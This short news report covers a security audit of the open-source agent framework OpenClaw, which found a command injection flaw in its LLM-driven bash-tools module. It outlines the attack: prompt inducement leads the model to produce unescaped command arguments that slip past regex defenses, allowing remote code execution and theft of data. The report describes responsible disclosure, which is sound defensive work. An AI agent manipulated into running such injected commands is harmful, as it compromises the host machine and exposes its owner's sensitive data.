Gate News: On March 16, the China Academy of Information and Communications Technology (CAICT), in collaboration with a joint team from Shanghai Jiao Tong University and Nanjing University, conducted a security audit of the open-source autonomous intelligent agent framework OpenClaw. They discovered a high-risk command injection vulnerability in the bash-tools module driven by large language models (LLMs). The vulnerability stems from the system not properly escaping command-line arguments generated by LLMs. Attackers can exploit a prompt inducement to bypass regex defenses, enabling remote code execution on the host machine and theft of sensitive data. The research team has verified the attack across various mainstream model environments, initiated a responsible vulnerability disclosure process, and submitted remediation suggestions to the NVDB AI Product Security Vulnerability Database (CAIVD) and the GitHub community.